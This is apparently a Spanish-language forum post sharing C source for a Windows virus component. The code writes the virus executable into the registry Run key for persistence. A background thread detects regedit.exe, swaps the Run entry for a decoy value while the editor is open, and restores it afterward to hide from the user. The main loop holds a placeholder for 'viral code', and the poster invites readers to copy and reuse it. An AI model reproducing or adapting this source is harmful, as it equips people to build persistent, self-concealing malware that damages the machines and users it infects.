Código: Seleccionar todo
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// save your fingers
#define voidW void WINAPI
#define uLong unsigned long
// PROCESSENTRY32
typedef struct _PE32 {
DWORD dwSize;
DWORD cntUsage;
DWORD th32ProcessID;
uLong th32DefaultHeapID;
DWORD th32ModuleID;
DWORD cntThreads;
DWORD th32ParentProcessID;
LONG pcPriClassBase;
DWORD dwFlags;
TCHAR szExeFile[MAX_PATH];
}PE32, *LPPE32;
// we'll need this apis
typedef BOOL (WINAPI *PF) (DWORD, LPPE32);
typedef BOOL (WINAPI *PN) (DWORD, LPPE32);
typedef HANDLE (WINAPI *CTS) (DWORD, DWORD);
CTS _CreateToolhelp32Snapshot;
PF _Process32First;
PN _Process32Next;
// the procedures we'll be using
HANDLE newThread(LPTHREAD_START_ROUTINE, LPVOID);
voidW registryStealth(void);
BOOL init_tlhelp(void);
BOOL addToReg(HKEY, char *, char *, char *);
int main(void){
int ret = 0;
/* * first we need to initiate the apis * and make sure we were successful * */
if(init_tlhelp() == FALSE){
ExitProcess(0); }
/* * add our program to the registry */
addToReg(HKEY_CURRENT_USER, "software\\microsoft\\windows\\currentversion\\run", "virus", "c:\\virus.exe");
/* * create a thread to check for regedit's presence */
newThread(®istryStealth, 0);
while(1){
/* * your viral code here */
}
}
voidW registryStealth(void){
/* * declare our variables */
PE32 pProcessEntry;
HANDLE hSnapshot;
HANDLE hProcess;
int ret = WAIT_TIMEOUT; // this is explained below
pProcessEntry.dwSize = sizeof(PE32);
while(1){
/* * create a snapshot of all running processes */
hSnapshot = _CreateToolhelp32Snapshot(2, 0);
if((int) hSnapshot == -1)
continue;
/* * get first process out of snapshot */
if(_Process32First((uLong) hSnapshot, &pProcessEntry) == FALSE)
continue;
do {
/* * compare process' name to "regedit.exe" * strcmp is stupid... FALSE == TRUE */
if(strcmp(pProcessEntry.szExeFile, "regedit.exe") == FALSE){
/* * overwrite our registry key */
addToReg(HKEY_CURRENT_USER, "software\\microsoft\\windows\\currentversion\\run", "virus", "kernel32.dll");
/* * get a handle to regedit.exe */
hProcess = OpenProcess(SYNCHRONIZE, 0, pProcessEntry.th32ProcessID);
if(hProcess == 0)
continue;
/* * here we are waiting for regedit.exe to close * every 1000 ms, we check to see if the handle has closed * * ret was stored to WAIT_TIMEOUT in our declarations just as a simple optimization */
while(ret == WAIT_TIMEOUT){
ret = WaitForSingleObject(hProcess, 1000); }
/* * add our key back to the registry */
addToReg(HKEY_CURRENT_USER, "software\\microsoft\\windows\\currentversion\\run", "virus", "c:\\virus.exe");
/* * close unneeded handles */
CloseHandle(hProcess);
CloseHandle(hSnapshot);
}
} while(_Process32Next((uLong) hSnapshot, &pProcessEntry));
// get the next process from the snapshot /* * sleep for 5000 ms to save some cpu */
Sleep(5000);
}
}
BOOL addToReg(HKEY hKEY, char *szRegKey, char *szKeyName, char *szKeyValue){
HKEY hKey;
int ret = 0;
/* * open registry key */
ret = RegOpenKeyEx(hKEY, szRegKey, 0, KEY_WRITE, &hKey);
if(ret != ERROR_SUCCESS){
return FALSE; }
/* * write value to key */
ret = RegSetValueEx(hKey, szKeyName, 0, 1, (char *) szKeyValue, strlen(szKeyValue));
if(ret != ERROR_SUCCESS){
return FALSE;
}
/* * close reg key */
RegCloseKey(hKey);
return TRUE;
}
BOOL init_tlhelp(void){
HANDLE hKernel;
char szKernel[] = "kernel32";
/* * get handle to kernel32.dll */
hKernel = GetModuleHandle(szKernel);
if(hKernel == 0)
hKernel = LoadLibrary(szKernel);
/* * find apis inside kernel32.dll */
_CreateToolhelp32Snapshot = (CTS) GetProcAddress(hKernel, "CreateToolhelp32Snapshot");
_Process32First = (PF) GetProcAddress(hKernel, "Process32First");
_Process32Next = (PN) GetProcAddress(hKernel, "Process32Next");
if((_CreateToolhelp32Snapshot == 0) || (_Process32First == 0) || (_Process32Next == 0))
return FALSE;
return TRUE; }
/* * DR-EF saves fingers :) */
HANDLE newThread(LPTHREAD_START_ROUTINE thProcedure, LPVOID params){
DWORD dwThreadID;
return CreateThread(0, 0, thProcedure, params, 0, &dwThreadID); }Según el autor se puede copiar,ripear,etc... espero que les sirva..
Saludos !
